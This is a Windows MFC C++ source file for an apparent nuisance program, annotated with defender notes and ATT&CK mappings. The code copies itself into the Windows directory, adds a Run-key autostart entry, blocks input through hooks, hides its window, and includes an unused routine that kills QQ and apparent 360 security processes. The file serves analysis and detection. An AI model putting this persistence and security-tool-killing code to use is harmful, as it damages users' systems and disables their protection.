// KeyBoardHookDialogDlg.cpp : implementation file
//
// NOTE(review): this listing was recovered from a page that had collapsed the
// file onto a few lines; line breaks, and which statements sit behind a "//",
// are reconstructed. Exact string values (paths, registry names) should be
// confirmed against a built sample rather than taken from this page.
//
// Behaviour visible in this file, read from a defender's point of view:
//   - OnInitDialog() calls CopySelf() and autoRun(), installs a mouse and a
//     keyboard hook for the dialog's own thread, and starts a 2000 ms timer.
//   - MouseProc/KeyboardProc return 1 for every event and never call
//     CallNextHookEx, so input seen by the hooks is not passed on.
//   - OnTimer() hides the dialog window and raises a message box on each tick.
// Copying the executable and registering it under a Run key is an autostart
// persistence pattern (MITRE ATT&CK T1547.001); a binary built from this file
// should be triaged as unwanted software.

#include "stdafx.h"
#include "KeyBoardHookDialog.h"
#include "KeyBoardHookDialogDlg.h"
// Registry subkey opened by autoRun() under HKEY_LOCAL_MACHINE.
#define REG_RUN "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
#include <tlhelp32.h>

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
//#pragma comment (lib,"KeyBoardHook")
/////////////////////////////////////////////////////////////////////////////
// CAboutDlg dialog used for App About

// Global HHOOK variables holding the handles returned by SetWindowsHookEx.
HHOOK g_hMouse;
HHOOK g_hKeyboard;
// Set to true at the end of OnInitDialog(); read by OnTimer() to decide
// whether to hide the window.
bool isTrue = false;
HWND hWnd; // stores the dialog's window handle (assigned in OnInitDialog)

// Note: the two hook procedures below are global functions, so Win32 APIs
// called inside them must use the global (::) form.

// Mouse hook procedure, installed by OnInitDialog() with WH_MOUSE.
// Ignores all three arguments and always returns 1 without calling
// CallNextHookEx, so every mouse message the hook sees is discarded instead
// of being delivered to its target window.
LRESULT CALLBACK MouseProc(
  int nCode,      // hook code
  WPARAM wParam,  // message identifier
  LPARAM lParam   // mouse coordinates
)
{
    return 1;
}

// Keyboard hook procedure, installed by OnInitDialog() with WH_KEYBOARD.
// Always returns 1 without calling CallNextHookEx, so keystrokes seen by the
// hook are discarded. The single exception in behaviour is F2: it sends
// WM_CLOSE to the saved dialog handle and removes both hooks (the F2 event
// itself is still swallowed by the final return).
LRESULT CALLBACK KeyboardProc(
  int code,       // hook code
  WPARAM wParam,  // virtual-key code
  LPARAM lParam   // keystroke-message information
)
{
//  if(VK_SPACE == wParam || VK_RETURN == wParam)  // block the Space and Enter keys
/*  if(VK_F4 == wParam && (lParam>>29 & 1))  // block ALT + F4
        return 1;
    else
        return CallNextHookEx(g_hKeyboard,code,wParam,lParam);*/
    // Author's "back door": pressing F2 makes the program exit.
    if(VK_F2 == wParam)
    {
        // Use the global API function to send the close message to the dialog.
        ::SendMessage(hWnd,WM_CLOSE,0,0);
        // Uninstall the hooks.
        UnhookWindowsHookEx(g_hMouse);
        UnhookWindowsHookEx(g_hKeyboard);
    }
    return 1;
}

// Standard MFC "About" dialog; it declares no data members or handlers here.
class CAboutDlg : public CDialog
{
public:
    CAboutDlg();

// Dialog Data
    //{{AFX_DATA(CAboutDlg)
    enum { IDD = IDD_ABOUTBOX };
    //}}AFX_DATA

    // ClassWizard generated virtual function overrides
    //{{AFX_VIRTUAL(CAboutDlg)
    protected:
    virtual void DoDataExchange(CDataExchange* pDX);    // DDX/DDV support
    //}}AFX_VIRTUAL

// Implementation
protected:
    //{{AFX_MSG(CAboutDlg)
    //}}AFX_MSG
    DECLARE_MESSAGE_MAP()
};

// Constructs the About dialog from the IDD_ABOUTBOX template.
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
    //{{AFX_DATA_INIT(CAboutDlg)
    //}}AFX_DATA_INIT
}

// Forwards to the base class; no DDX/DDV mappings are defined.
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
    CDialog::DoDataExchange(pDX);
    //{{AFX_DATA_MAP(CAboutDlg)
    //}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
    //{{AFX_MSG_MAP(CAboutDlg)
        // No message handlers
    //}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CKeyBoardHookDialogDlg dialog

// Constructs the main dialog and loads the application icon.
CKeyBoardHookDialogDlg::CKeyBoardHookDialogDlg(CWnd* pParent /*=NULL*/)
    : CDialog(CKeyBoardHookDialogDlg::IDD, pParent)
{
    //{{AFX_DATA_INIT(CKeyBoardHookDialogDlg)
        // NOTE: the ClassWizard will add member initialization here
    //}}AFX_DATA_INIT
    // Note that LoadIcon does not require a subsequent DestroyIcon in Win32
    m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}

// Forwards to the base class; no DDX/DDV mappings are defined.
void CKeyBoardHookDialogDlg::DoDataExchange(CDataExchange* pDX)
{
    CDialog::DoDataExchange(pDX);
    //{{AFX_DATA_MAP(CKeyBoardHookDialogDlg)
        // NOTE: the ClassWizard will add DDX and DDV calls here
    //}}AFX_DATA_MAP
}

// Routes system-command, paint, drag-icon, button-click and timer messages to
// the handlers defined in this file.
BEGIN_MESSAGE_MAP(CKeyBoardHookDialogDlg, CDialog)
    //{{AFX_MSG_MAP(CKeyBoardHookDialogDlg)
    ON_WM_SYSCOMMAND()
    ON_WM_PAINT()
    ON_WM_QUERYDRAGICON()
    ON_BN_CLICKED(IDC_BTN_HOOKON, OnBtnHookon)
    ON_WM_TIMER()
    //}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CKeyBoardHookDialogDlg message handlers

// Dialog initialisation. Besides the wizard-generated menu and icon setup it:
//   1. calls CopySelf() and then autoRun() (file copy + registry autostart),
//   2. installs WH_MOUSE and WH_KEYBOARD hooks for the current thread,
//   3. stores the window handle for KeyboardProc,
//   4. starts timer 1 with a 2000 ms period and sets the isTrue flag.
// Returns TRUE, as the framework expects when focus is not set manually.
BOOL CKeyBoardHookDialogDlg::OnInitDialog()
{
    CDialog::OnInitDialog();

    // Add "About..." menu item to system menu.

    // IDM_ABOUTBOX must be in the system command range.
    ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
    ASSERT(IDM_ABOUTBOX < 0xF000);

    CMenu* pSysMenu = GetSystemMenu(FALSE);
    if (pSysMenu != NULL)
    {
        CString strAboutMenu;
        strAboutMenu.LoadString(IDS_ABOUTBOX);
        if (!strAboutMenu.IsEmpty())
        {
            pSysMenu->AppendMenu(MF_SEPARATOR);
            pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
        }
    }

    // Set the icon for this dialog.  The framework does this automatically
    //  when the application's main window is not a dialog
    SetIcon(m_hIcon, TRUE);         // Set big icon
    SetIcon(m_hIcon, FALSE);        // Set small icon

    // TODO: Add extra initialization here
    // CopySelf() must run first: autoRun() writes the path that CopySelf()
    // leaves in szWindowsPath.
    CopySelf();
    autoRun(); // start via the registry
    // Install the hooks.
//  ShowProcess();
    // Both hooks pass a NULL module handle and GetCurrentThreadId(), i.e. they
    // are registered for this thread only, not system-wide. Return values are
    // stored but not checked for failure.
    g_hMouse = SetWindowsHookEx(WH_MOUSE,MouseProc,NULL,GetCurrentThreadId());
    g_hKeyboard = SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,NULL,GetCurrentThreadId());
    // Save the window handle so KeyboardProc can send WM_CLOSE to it.
    hWnd = m_hWnd;
    // No callback is supplied; ON_WM_TIMER in the message map routes the
    // resulting WM_TIMER messages to OnTimer().
    SetTimer(1, 2000, NULL);
    isTrue = true;
    return TRUE;  // return TRUE  unless you set the focus to a control
}

// Shows the About dialog for IDM_ABOUTBOX; all other system commands go to
// the base class.
void CKeyBoardHookDialogDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
    if ((nID & 0xFFF0) == IDM_ABOUTBOX)
    {
        CAboutDlg dlgAbout;
        dlgAbout.DoModal();
    }
    else
    {
        CDialog::OnSysCommand(nID, lParam);
    }
}

// If you add a minimize button to your dialog, you will need the code below
//  to draw the icon.  For MFC applications using the document/view model,
//  this is automatically done for you by the framework.

// Draws the icon centred in the client area while the dialog is minimised;
// otherwise defers to the base-class paint handler.
void CKeyBoardHookDialogDlg::OnPaint()
{
    if (IsIconic())
    {
        CPaintDC dc(this); // device context for painting

        SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);

        // Center icon in client rectangle
        int cxIcon = GetSystemMetrics(SM_CXICON);
        int cyIcon = GetSystemMetrics(SM_CYICON);
        CRect rect;
        GetClientRect(&rect);
        int x = (rect.Width() - cxIcon + 1) / 2;
        int y = (rect.Height() - cyIcon + 1) / 2;

        // Draw the icon
        dc.DrawIcon(x, y, m_hIcon);
    }
    else
    {
        CDialog::OnPaint();
    }
}

// The system calls this to obtain the cursor to display while the user drags
//  the minimized window.
// Returns the dialog icon as the cursor shown while the minimised window is
// dragged.
HCURSOR CKeyBoardHookDialogDlg::OnQueryDragIcon()
{
    return (HCURSOR) m_hIcon;
}

// Click handler for IDC_BTN_HOOKON; intentionally empty in this listing (the
// hooks are installed from OnInitDialog() instead).
void CKeyBoardHookDialogDlg::OnBtnHookon()
{
    // TODO: Add your control notification handler code here
}

//DEL void CKeyBoardHookDialogDlg::OnBtnHookoff()
//DEL {
//DEL   // TODO: Add your control notification handler code here
//DEL   SetHookOff();
//DEL
//DEL }

// Hides the dialog window. No caller is visible in this file; OnTimer() calls
// ShowWindow(SW_HIDE) directly.
void CKeyBoardHookDialogDlg::hide()
{
    ShowWindow(SW_HIDE);
}

// Registers the copied executable for automatic start.
// Opens the REG_RUN subkey under HKEY_LOCAL_MACHINE and writes a REG_SZ value
// named "mynona" whose data is szWindowsPath (presumably a char buffer member
// declared in the header, which is not visible here; CopySelf() fills it in
// and OnInitDialog() calls CopySelf() first). Returns silently when the key
// cannot be opened; the result of RegSetValueEx is not checked.
// NOTE(review): for detection, registry-write telemetry on the machine-wide
// Run key showing a value named "mynona" is the indicator this function
// leaves behind (MITRE ATT&CK T1547.001). Confirm the exact key and data
// strings against a built sample.
void CKeyBoardHookDialogDlg::autoRun()
{
    HKEY hKey = NULL;
    LONG lRet = RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey);
    if(lRet != ERROR_SUCCESS)
    {
        return;
    }
    // Data length passed is the string length plus one byte for the terminator.
    RegSetValueEx(hKey,"mynona",NULL,REG_SZ,(const unsigned char *)&szWindowsPath, strlen(szWindowsPath) +sizeof(char));
    RegCloseKey(hKey);
}

// Walks a Toolhelp process snapshot and, for entries whose image name equals
// one of three hard-coded names (QQ.exe, 360tray.exe, 360rp.exe), shows the
// name in a message box and asks the system to terminate that process.
// The only call site visible in this file, in OnInitDialog(), is commented
// out, so this routine appears to be unused as listed.
// NOTE(review): 360tray.exe and 360rp.exe look like components of an
// endpoint-security product (the author's own comment lists "360IOSMgrSrv
// 360tray") -- confirm. Terminating security tooling by process name is a
// defence-evasion behaviour (MITRE ATT&CK T1562.001); unexpected exits of
// protection processes shortly after a new binary starts are worth alerting
// on.
void CKeyBoardHookDialogDlg::ShowProcess()
{
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
    //...
    PROCESSENTRY32 Pe32 = {0};
    // dwSize must be set before the first Process32First call.
    Pe32.dwSize = sizeof(PROCESSENTRY32);
    int bRet = Process32First(hSnap,&Pe32);
    //360IOSMgrSrv 360tray
    // Target image names; compared case-sensitively with strcmp below.
    char name[MAX_PATH] = "QQ.exe";
    char name2[MAX_PATH] = "360tray.exe";
    char name3[MAX_PATH] = "360rp.exe";
    while(bRet)
    {
        //...
        bRet = Process32Next(hSnap,&Pe32);
        //cout<<"id:"<<Pe32.th32ProcessID<<" name:"<<Pe32.szExeFile<<endl;
        int flag = 0;
        if(strcmp(Pe32.szExeFile,name) == 0 || strcmp(Pe32.szExeFile,name3) == 0 || strcmp(Pe32.szExeFile,name2) ==0)
            flag = 1;
        if(flag){
        //  cout<<"----------------------"<<Pe32.th32ProcessID<<endl;
            // Displays the matched image name before the termination attempt.
            MessageBox(Pe32.szExeFile);
            // Only PROCESS_TERMINATE access is requested; the handle is not
            // checked for NULL.
            HANDLE hProcess = OpenProcess(PROCESS_TERMINATE,FALSE,Pe32.th32ProcessID);
            LPDWORD lpExitCode = 0;
            GetExitCodeProcess(hProcess, lpExitCode);
            TerminateProcess(hProcess, (UINT)lpExitCode);
        }
    }
}

// Copies the running executable to a path built from the Windows directory.
// Steps: read this module's own path into szSelfName, read the Windows
// directory into szWindowsPath, append the file-name literal, show the
// resulting path in a message box, then CopyFile with overwrite allowed.
// szWindowsPath is left holding the destination path, which autoRun() later
// writes to the registry. None of the API results are checked.
// NOTE(review): for detection, look for a process writing a copy of its own
// image to a file whose name ends in "mynona.exe" under the Windows
// directory path; confirm the exact destination against a built sample.
void CKeyBoardHookDialogDlg::CopySelf()
{
    char szSelfName[MAX_PATH] = {0};
//  char szSystemPath[MAX_PATH] = {0};
    char szTmpPath[MAX_PATH] = {0}; // not used anywhere in this function
    // Get the path of the currently running program.
    GetModuleFileName(NULL,szSelfName,MAX_PATH);
    //cout<<"szSelfName:"<<szSelfName<<endl;
    // Get the Windows directory (the original comment said "system directory").
    GetWindowsDirectory(szWindowsPath,MAX_PATH);
//  cout<<"szWindowsPath:"<<szWindowsPath<<endl;
    // Get the system directory (disabled; the original comment said "windows directory").
//  GetSystemDirectory(szSystemPath,MAX_PATH);
    //cout<<"szSystemPath:"<<szSystemPath<<endl;
    strcat(szWindowsPath,"\mynona.exe");
    //strcat(szSystemPath,"\mynona.exe");
    // Shows the destination path to the user; caption is ": szWindowsPath".
    MessageBox( szWindowsPath,": szWindowsPath");
    //MessageBox( szSystemPath,": szSystemPath");
    // This local isTrue shadows the file-level flag of the same name and is
    // never read.
    int isTrue = CopyFile(szSelfName,szWindowsPath,FALSE); // FALSE means an existing file is overwritten
//  int isTrue2 = CopyFile(szSelfName,szSystemPath,FALSE);
}

// WM_TIMER handler; timer 1 is started in OnInitDialog() with a 2000 ms
// period. When the file-level isTrue flag is set it hides the dialog window,
// then shows a message box with the stop icon, and finally forwards the event
// to the base class.
void CKeyBoardHookDialogDlg::OnTimer(UINT nIDEvent)
{
    // TODO: Add your message handler code here and/or call default
    if(isTrue){
        ShowWindow(SW_HIDE);
    }
    MessageBox("haha","哈哈",MB_ICONSTOP);
    CDialog::OnTimer(nIDEvent);
}